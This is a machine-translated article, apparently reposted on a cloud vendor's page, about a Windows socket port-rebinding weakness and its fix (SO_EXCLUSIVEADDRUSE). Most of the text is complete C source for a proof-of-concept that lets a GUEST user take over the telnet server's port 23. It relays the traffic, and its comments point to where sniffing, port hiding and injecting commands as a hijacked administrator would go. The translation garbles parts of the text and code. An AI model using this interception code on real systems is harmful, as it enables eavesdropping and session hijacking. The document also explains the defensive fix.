Socket rebinding port listening interception for hidden sniffing and attacks

Source: Internet
Author: User
Tags socket connect
In the programming of the SOCKET server application of asp.cn/class = wordstyle> WINDOWS, the following statements may be compared to the following:

 

S = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP );

Saddr. sin_family = AF_INET;

Saddr. sin_addr.s_addr = htonl (INADDR_ANY );

Bind (s, (SOCKADDR *) & saddr, sizeof (saddr ));

In fact, there is a big security risk in _ blank>, because in the implementation of winsock, the server can be bound multiple times. When determining who to use multiple bindings, according to one principle, the user who specifies the package is the most explicit and has no permissions. That is to say, users with low-level permissions can be rebound to high-level permissions, such as the port on which the service starts, this is a very important security risk.

What does this mean? This means that the following attacks can be performed:

1. A _ blank> Trojan is bound to a valid port to hide the port. It uses its own package format to determine whether it is its own package. If it is handled by itself, if it is not through 127.0.0.1 address to the Real Server application for processing.

2. A Trojan can bind a port of a High-Permission service application to a low-Permission user to sniff the processing information, originally, listening to a SOCKET communication on a host requires a high level of permission. However, using SOCKET rebinding, you can easily listen for communication with this SOCKET programming _ blank> vulnerability, you do not need to use any hook, hook, or low-layer driver Technology (these must have the administrator privilege to achieve)

3. for some special applications, man-in-the-middle attacks can be initiated to obtain information from low-Permission users or to cheat the facts. For example, the man-in-the-middle attack can intercept port 23 of the telnet server under the guest permission, if NTLM is used for encryption and authentication, although you cannot obtain the password through sniffing, once an admin user logs on to the console, your application can initiate man-in-the-middle attacks, assume that the login user sends a high-Permission command through the SOCKET to reach the goal of _ blank> intrusion.

4. for a built WEB server, intruders only need to obtain low-level permissions to completely change the WEB page. It is very easy to assume that your server responds to connection requests with other information, it is even based on e-commerce spoofing to obtain illegal data.

In fact, many of MS's services have such a SOCKET programming problem. telnet, ftp, and http Service implementations can all use this method for attacks, the SYSTEM application is intercepted on low-Permission users. The same is true for IIS, including W2K + SP3. If you have been able to intrude into or implant Trojans with low permissions and the other party has enabled these services, try again. In addition, I estimate that many third-party services also have this vulnerability.

The solution is very simple. before writing the above application, you need to use setsockopt to specify SO_EXCLUSIVEADDRUSE to exclusively occupy all port addresses, instead of allowing reuse. In this way, other people cannot reuse this port.

The following is an example of a simple telnet server for intercept listening ms. All the users in GUEST can successfully intercept listening. The rest is that you have made some special cropping issues based on your own needs: such as hiding, sniffing data, and high-Permission user spoofing.

# Include
# Include WINDOWS. H>
# Include
# Include
Dword winapi Cl_blank> ientThread (LPVOID lpParam );
Int main ()
{
WORD wVersionRequested;
DWORD ret;
WSADATA wsaData;
BOOL val;
SOCKADDR_IN saddr;
SOCKADDR_IN scaddr;
Int err;
SOCKET s;
SOCKET SC;
Int caddsize;
HANDLE mt;
DWORD tid;
WVersionRequested = MAKEWORD (2, 2 );
Err = WSAStartup (wVersionRequested, & wsaData );
If (err! = 0 ){
Printf ("error! WSAStartup failed! \ N ");
Return-1;
}
Saddr. sin_family = AF_INET;
  
// Although the intercept can also be set to INADDR_ANY, you should specify a specific IP address and leave 127.0.0.1 to the normal service application if it does not affect normal applications, then use this address for forwarding, so that the normal application of the other party is not affected.

Saddr. sin_addr.s_addr = inet_addr ("192.168.0.60 ");
Saddr. sin_port = htons (23 );
If (s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) = SOCKET_ERROR)
{
Printf ("error! Socket failed! \ N ");
Return-1;
}
Val = TRUE;
// The SO_REUSEADDR option enables port rebinding.
If (setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char *) & val, sizeof (val ))! = 0)
{
Printf ("error! Setsockopt failed! \ N ");
Return-1;
}
// If SO_EXCLUSIVEADDRUSE is specified, no binding is successful and no error code is returned;
// If you want to hide the port by making full use of it, You can dynamically test which port can be successfully bound. This vulnerability indicates that the port can be used dynamically to make it more concealed.
// In fact, UDP ports can be rebound in this way. The TELNET service is used as an example to launch attacks.

If (bind (s, (SOCKADDR *) & saddr, sizeof (saddr) = SOCKET_ERROR)
{
Ret = GetLastError ();
Printf ("error! Bind failed! \ N ");
Return-1;
}
Listen (s, 2 );
While (1)
{
Caddsize = sizeof (scaddr );
// Accept the connection request
SC = accept (s, (struct sockaddr *) & scaddr, & caddsize );
If (SC! = INVALID_SOCKET)
{
Mt = CreateThread (NULL, 0, ClientThread, (LPVOID) SC, 0, & tid );
If (mt = NULL)
{
Printf ("Thread Creat Failed! \ N ");
Break;
}
}
CloseHandle (mt );
}
Closesocket (s );
WSACleanup ();
Return 0;
}
Dword winapi ClientThread (LPVOID lpParam)
{
SOCKET ss = (SOCKET) lpParam;
SOCKET SC;
Unsigned char buf [4096];
SOCKADDR_IN saddr;
Long num;
DWORD val;
DWORD ret;
// If it is a hidden port application, you can add some judgments here
// If it is your own package, you can perform some special processing. Otherwise, you can forward it through 127.0.0.1.
Saddr. sin_family = AF_INET;
Saddr. sin_addr.s_addr = inet_addr ("127.0.0.1 ");
Saddr. sin_port = htons (23 );
If (SC = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) = SOCKET_ERROR)
{
Printf ("error! Socket failed! \ N ");
Return-1;
}
Val = 100;
If (setsockopt (SC, SOL_SOCKET, SO_RCVTIMEO, (char *) & val, sizeof (val ))! = 0)
{
Ret = GetLastError ();
Return-1;
}
If (setsockopt (ss, SOL_SOCKET, SO_RCVTIMEO, (char *) & val, sizeof (val ))! = 0)
{
Ret = GetLastError ();
Return-1;
}
If (connect (SC, (SOCKADDR *) & saddr, sizeof (saddr ))! = 0)
{
Printf ("error! Socket connect failed! \ N ");
Closesocket (SC );
Closesocket (ss );
Return-1;
}
While (1)
{
// The following code is mainly implemented through 127. 0. 0. 1. This address forwards the packet to the real application, and forwards the response packet back.
// If the content is sniffing, you can analyze and record the content here.
// If it is an attack such as a TELNET server, you can use its high-Permission login user to analyze its login user, and then use it to send a specific package for execution as a hijacked user.
Num = recv (ss, buf, 4096,0 );
If (num> 0)
Send (SC, buf, num, 0 );
Else if (num = 0)
Break;
Num = recv (SC, buf, 4096, 0 );
If (num> 0)
Send (ss, buf, num, 0 );
Else if (num = 0)
Break;
}
Closesocket (ss );
Closesocket (SC );
Return 0;
}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.